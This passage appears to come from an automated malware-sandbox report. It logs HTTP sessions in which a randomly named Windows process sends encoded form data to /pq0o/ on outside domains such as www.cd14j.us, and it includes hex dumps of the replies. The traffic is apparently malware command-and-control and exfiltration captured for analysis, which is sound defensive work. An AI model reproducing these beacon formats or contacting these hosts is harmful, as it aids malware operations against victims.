F49hs=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
Apr 24, 2024 09:21:22.683279991 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Wed, 24 Apr 2024 07:21:22 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	91.195.240.19	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:25.210408926 CEST	363	OUT	GET /pq0o/?F49hs=zlo+FGSBhCkM5GVJsyQNaVbtL67WnJg88Yj7BD8zO0hDA+Ttp+tE7JQXtFhQSzjU/FmrV36xGrNmbpUbkD9mLWK1UOLjaHYQ4bVPRZ9N4YEmnoiYZJFdoy8=&9ZZXx=T6kxVZuXAVuH9J HTTP/1.1 Host: www.luckydomainz.shop Accept: / Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com
Apr 24, 2024 09:21:26.470026970 CEST	1289	IN	HTTP/1.1 200 OK date: Wed, 24 Apr 2024 07:21:26 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-powered-by: PHP/8.1.17 expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_U/Z+veD+IGXno1lF6DozlhCOnugiOATNqQLu1rTS4K/4IpomeVEUZX43yJ+jXa/4n9u+e/kHJJjficm3vvho9Q== last-modified: Wed, 24 Apr 2024 07:21:25 GMT x-cache-miss-from: parking-55fd589654-dwrqw server: NginX connection: close Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 55 2f 5a 2b 76 65 44 2b 49 47 58 6e 6f 31 6c 46 36 44 6f 7a 6c 68 43 4f 6e 75 67 69 4f 41 54 4e 71 51 4c 75 31 72 54 53 34 4b 2f 34 49 70 6f 6d 65 56 45 55 5a 58 34 33 79 4a 2b 6a 58 61 2f 34 6e 39 75 2b 65 2f 6b 48 4a 4a 6a 66 69 63 6d 33 76 76 68 6f 39 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_U/Z+veD+IGXno1lF6DozlhCOnugiOATNqQLu1rTS4K/4IpomeVEUZX43yJ+jXa/4n9u+e/kHJJjficm3vvho9Q==><head><meta charset="utf-8"><title>luckydomainz.shop - luckydomainz Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="luckydomainz.shop is your first and best source for all of the information youre looking for. Fro
Apr 24, 2024 09:21:26.470139027 CEST	1289	IN	Data Raw: 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6c 75 63 6b 79 64 6f 6d 61 69 6e 7a 2e 73 68 6f 70 20 Data Ascii: m general topics to more of what you would expect to find here, luckydomainz.shop has it all. We hope y576ou find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/
Apr 24, 2024 09:21:26.470180035 CEST	1289	IN	Data Raw: 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b Data Ascii: idden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=suAECbmit]{-webkit-app
Apr 24, 2024 09:21:26.470221043 CEST	1289	IN	Data Raw: 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 30 65 31 36 32 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 Data Ascii: nt{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:ce
Apr 24, 2024 09:21:26.470261097 CEST	446	IN	Data Raw: 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 Data Ascii: ntent-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-s
Apr 24, 2024 09:21:26.470303059 CEST	1289	IN	Data Raw: 31 42 34 45 0d 0a 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 6f 74 74 6f 6d 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 7a Data Ascii: 1B4Eookie-message{position:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-rig
Apr 24, 2024 09:21:26.470341921 CEST	1289	IN	Data Raw: 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 6e 65 63 65 73 Data Ascii: indow__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;te
Apr 24, 2024 09:21:26.470386028 CEST	1289	IN	Data Raw: 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f Data Ascii: ;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch
Apr 24, 2024 09:21:26.470500946 CEST	1289	IN	Data Raw: 65 72 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6d 61 72 67 69 6e 3a 30 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 Data Ascii: er{color:#848484;font-size:15px;margin:0}.container-content__left{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;z-index:-1;top:50px;position:inherit}.
Apr 24, 2024 09:21:26.470541954 CEST	1289	IN	Data Raw: 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e Data Ascii: ");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-
Apr 24, 2024 09:21:26.774883986 CEST	1289	IN	Data Raw: 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6c 6f 77 65 72 63 61 73 65 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 23 63 6f 6e 74 61 69 6e 65 72 2d 64 6f 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 Data Ascii: tion:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center}#plBanner{margin:0px 0px 20px 0px;width:100%;height:140px;text-align:center}.nc-img{width:100%;height:auto;max-width:1440px;cursor:pointer}.nc-c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49748	91.195.240.123	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:32.301472902 CEST	602	OUT	POST /pq0o/ HTTP/1.1 Host: www.cd14j.us Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.cd14j.us Content-Length: 202 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cd14j.us/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 2b 66 67 68 4a 66 4a 57 74 64 53 58 75 79 4a 77 30 4f 31 51 66 73 5a 48 45 71 72 50 68 65 53 71 7a 71 43 46 57 53 78 41 64 69 4b 45 5a 2f 6e 34 38 77 5a 70 52 68 58 6a 6e 64 4b 57 2f 4d 54 66 74 47 33 4e 79 32 32 48 78 45 45 71 37 32 32 32 6a 55 39 36 46 47 38 73 71 5a 56 6d 38 59 31 46 49 65 69 50 56 55 44 6a 69 6e 6e 4c 52 41 45 30 53 46 5a 6e 75 56 44 2b 54 33 43 62 75 4c 6c 31 43 32 52 67 45 76 58 63 76 50 71 72 35 67 4d 4d 62 38 49 39 77 56 52 6f 37 38 78 44 36 79 32 56 71 73 75 34 68 4b 4a 61 4a 5a 72 56 53 62 32 75 52 31 4c 65 78 69 51 66 61 51 38 55 58 6b 49 4c 4a 67 3d 3d Data Ascii: F49hs=+fghJfJWtdSXuyJw0O1QfsZHEqrPheSqzqCFWSxAdiKEZ/n48wZpRhXjndKW/MTftG3Ny22HxEEq7222jU96FG8sqZVm8Y1FIeiPVUDjinnLRAE0SFZnuVD+T3CbuLl1C2RgEvXcvPqr5gMMb8I9wVRo78xD6y2Vqsu4hKJaJZrVSb2uR1LexiQfaQ8UXkILJg==
Apr 24, 2024 09:21:32.611880064 CEST	701	IN	HTTP/1.1 405 Not Allowed date: Wed, 24 Apr 2024 07:21:32 GMT content-type: text/html content-length: 556 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49749	91.195.240.123	80	2412	C:\Program Files (x86)\jfLWIrNvBdXUZqKTstLPidJuesjIeBIFNQYCGaQUpAbARGedGUlMKIlGqKpEAySWKlETcTxWvVYd\tAFcdstzdUTfkmQlByDmlLl.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 09:21:35.133018970 CEST	622	OUT	POST /pq0o/ HTTP/1.1 Host: www.cd14j.us Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate Origin: http://www.cd14j.us Content-Length: 222 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.cd14j.us/pq0o/ User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) LinkCheck by Siteimprove.com Data Raw: 46 34 39 68 73 3d 2b 66 67 68 4a 66 4a 57 74 64 53 58 75 53 5a 77 7a 76 31 51 49 38 5a 41 59 36 72 50 6f 2b 54 68 7a 71 47 46 57 51 64 70 64 30 53 45 65 62 76 34 37 42 5a 70 53 68 58 6a 2f 4e 4b 54 79 73 54 69 74 47 71 77 79 32 4b 48 78 41 55 71 37 32 47 32 6b 69 31 39 45 57 38 75 69 35 56 6b 79 34 31 46 49 65 69 50 56 51 54 46 69 6e 50 4c 